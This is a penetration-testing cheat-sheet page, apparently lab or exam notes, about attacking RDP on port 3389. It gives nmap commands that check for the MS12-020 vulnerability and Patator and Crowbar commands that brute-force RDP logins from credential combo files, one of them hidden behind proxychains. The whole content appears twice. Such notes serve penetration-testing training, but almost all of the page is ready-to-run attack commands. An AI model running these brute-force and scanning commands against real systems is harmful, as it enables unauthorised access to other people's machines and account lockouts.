RDP - 3389

Find available rdp nse scripts

ls /usr/share/nmap/scripts/ | grep rdp-

Nmap

nmap -oN rdp.nmap –script rdp-enum-encryption,rdp-vuln-ms12-020 –script-args= -d -sV -T2 -v -p 3389 10.11.1.22

Patator RDP NLA brute

–rate-limit=N consider using this to delay each test since it might lock us out

patator rdp_login host=10.1.1.33 user=COMBO00 password=COMBO01 0=./combo.txt -x ignore:fgrep=’denied’

Patator Anonymous BruteForce proxychains

proxychains patator rdp_login host=10.1.1.248 user=COMBO00 password=COMBO01 0=/root/lab-net2019/combo-creds.txt –rate-limit=2 –threads=1 -x ignore:fgrep=’denied’ -l rdp_brute

Crowbar.py

crowbar.py -b rdp -u walter -c P@ssWORD1234 -s 10.1.1.22/32 -v

PreviousTELNET - 23 NextDISTCCD - 3632

Last updated 4 years ago

Was this helpful?

RDP - 3389

Find available rdp nse scripts

ls /usr/share/nmap/scripts/ | grep rdp-

Nmap

nmap -oN rdp.nmap –script rdp-enum-encryption,rdp-vuln-ms12-020 –script-args= -d -sV -T2 -v -p 3389 10.11.1.22

Patator RDP NLA brute

–rate-limit=N consider using this to delay each test since it might lock us out

patator rdp_login host=10.1.1.33 user=COMBO00 password=COMBO01 0=./combo.txt -x ignore:fgrep=’denied’

Patator Anonymous BruteForce proxychains

proxychains patator rdp_login host=10.1.1.248 user=COMBO00 password=COMBO01 0=/root/lab-net2019/combo-creds.txt –rate-limit=2 –threads=1 -x ignore:fgrep=’denied’ -l rdp_brute

Crowbar.py

crowbar.py -b rdp -u walter -c P@ssWORD1234 -s 10.1.1.22/32 -v

PreviousTELNET - 23 NextDISTCCD - 3632

Last updated 4 years ago

Was this helpful?